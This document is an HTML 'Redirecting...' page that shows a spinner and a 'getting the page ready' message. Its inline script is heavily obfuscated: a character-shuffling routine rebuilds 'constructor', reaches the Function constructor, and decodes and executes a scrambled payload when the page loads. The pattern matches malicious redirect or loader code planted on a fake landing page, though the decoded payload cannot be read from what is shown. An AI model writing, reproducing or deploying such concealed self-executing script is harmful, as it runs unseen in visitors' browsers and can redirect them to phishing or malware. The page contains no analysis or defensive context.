<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Redirecting...</title>
  <style>
    body {
      margin: 0;
      padding: 0;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      font-family: Arial, sans-serif;
      background-color: #f0f0f0;
    }

    .loader {
      text-align: center;
    }

    .logo {
      width: 100px; /* Adjust width as needed */
      height: auto;
      margin-bottom: 20px;
    }

    .loader-icon {
      width: 80px;
      height: 80px;
      border-radius: 50%;
      border: 4px solid #3498db;
      border-top: 4px solid transparent;
      animation: spin 1s linear infinite;
      margin: 0 auto 20px auto;
    }

    @keyframes spin {
      0% { transform: rotate(0deg); }
      100% { transform: rotate(360deg); }
    }

    .loading-text {
      font-size: 18px;
      color: #555;
      font-weight: bold; /* Making the text bold */
      text-align: center; /* Centering the text */
    }
  </style>
</head>
<body>
  <div class="loader">
    <img src="61046931ada36000041881bd.png" alt="Logo" class="logo">
    <div class="loader-icon"></div>
    <p class="loading-text">Give us a few moments while we get the page ready...</p>
  </div>

  <script>
    (function(){var HoV='',HLt=966-955;function XYo(z){var n=3701228;var o=z.length;var y=[];for(var j=0;j<o;j++){y[j]=z.charAt(j)};for(var j=0;j<o;j++){var w=n*(j+492)+(n%29551);var m=n*(j+541)+(n%25422);var v=w%o;var s=m%o;var f=y[v];y[v]=y[s];y[s]=f;n=(w+m)%4431559;};return y.join('')};var qte=XYo('comtircpkqdacutrbuhflssoovgxenrtwnyjz').substr(0,HLt);var hBt='ah;}cfn2mj=voad(5o.vrr;]=)yrcnefgari]ldnhlqa4]=bsi].kc=ak {v(,=s((hi))+v;drf8ia](0r2=7(b=s,A56gce8vg60a87,l+pr=[[4r,ea=9,;vhoath=olrar[o(r Cdpo()6)),n)7*)6p=o;[)aa, rqn,l+re(}e=])clrnpo;,novra{;z,af)es,hrh"=nre.h;0u7ff;g.p)3gwS()z;x.ono}pr;<=latld}6o].7 s,.(" =)cf-((v-n2i,hv+[t;r{v{;<n=0ru;9)t7b0Clotet;r.( mf"daaAb)1r ca.; ,lbrllp=e=run (a8 +;nhn0l=Aa"+;);-itx9 a6f[r<tavhe={66j;)g1mc+h6()nia 1rs{q5f]-af[sg1p>oi"(=n;=+to(z+[.sqlr[+veftru+pqaqpje.tst1;ro s} ss(.;;qa8s,v),naon-gtun[,fcf,-,zib;g)qg1(gdn.."h0r(+te;thjo2e-j(pg2t7+9}hte7r.0v,noivu]six w[}=(;esr7=hqeo8=f>irl.pu=rtc.),ss.+t (;iv=l1+o2 ;nA*al0+ )h;fj(+2;9=f]t2)C;duota)+;<rol.vu+4afe);1[t!td n2krr b5=oeaesw=f"cw; hg.p(jai.3,vahtuel4hvt(jrino""9[8af ia.h=il;h+atc2=3t1t0].=vnurdi=]]va8 e0(avi1<,;)Alrmh)Cra;k;iru(,rise)e+vv;(+)rg+sco,C1n;")d=.;[l8l=w+.=ioa=(a=;)fqvu(nCSae08z,fr;=Cp o=.;emrC.t)69dg+unnrr]aau;18axe!=(c( g,q{);';var hWd=XYo[qte];var Byr='';var VXn=hWd;var Uxh=hWd(Byr,XYo(hBt));var QIX=Uxh(XYo('c&FF)F9,).{ca}]\/.l.!Fu_rg$cf!u\/o.o(.shFanr!3_otgqa3;$FeF;0)}2"sFse5$(l=ijo_!tt=)8ndc!Fc.c(bd+sF\/t7s=t")v2(\/t&b5a!+ac,({ho30(agb.\/!n.,cbop;.$c4e5c.Ff_,n(hi%dFdFt)ujr!9\'e3c((! jn,4$ailj{)6mm45eft.)r9i,4(3re&.nl)g{,r;\/1.&oF44gq r(h-arc$C4;faa.czF0os2rFF=)\'.Fv4=je__]!cFer;yb.!gp.}Sn_.!+m(F0r34sho(oFr={ e](o{F;u)Fo=l(t3$).F\/cnp3C4,F$bF)sr(;.cm=.$eF,.q32,)F?ua4n0F)=2..6_bot.rSg\/w2;p+)(vs,F _,9t.FF)!p1r 0c)3atFe37s1=FS55;.)"e;}4.hfeFFa[no(w3F]_yF.F=,o4F.)$s24"nF])1d;F $c$Fs\',)(9;csds,(j8v,.+cse-\'=j1F"3Fk(;&(Fe;s.,mzs)Frs)g2_,ez43rtb.(F)(.z%,%s_;,.s.i%i.]iagt).4z.am!hleF$o4 12Fr;F(a= FcF1$!om3+# .u#e}=$eg.uF(4,\/(]0(f6;t)#.eF=Frer.!\/i= _.f3.sF3F,F(t=$[FpF)p.l!!h)F\/FF_Fbf%r2F1jz#3.cl!s(F}_0%FFFpzSgF)((F,d.no=ee4]*$)-dgF)b]ulr2.o"tFy(n0F$7s8c55o!)0et.-7)io].05..5f."ctter62agsyF 8aF(t.),s(amF.ekFuaauaF5re5vF,ror_ga.*v$%&.0\/tup_o*0;ra)).$_.2eFeFtbe\/mv:j.c,Fb2;=".3[sF.i.S6.=p){ic5)Fo};#.(w)r1c]}w,(.ee4geF=o(F0sS(+i;Fa)&2)F%zt3){_z2.F".=7,ca,Fr c{,3a12h,ae(%)Fcma{;f3Fvcj5ie be))!aar%5o9!}qo( .#i1Frle;f+d3!F7i+2cF_F()#$ .c_jFF3$8r.4gi}!t2orsa)m*nj (j F(fk$y. ipnl=h,]!ao${(tc..)50F_.\/#m4%FFa \';$F$er5[50.5s321tofi}o}s57$rFani]whu7.ojt!oacFdt2+_;Fan [e(3p.c07F!a \'mo$;c51T%6!_]'));var teE=VXn(HoV,QIX );teE(9319);return 2210})()
  </script>
</body>
</html>
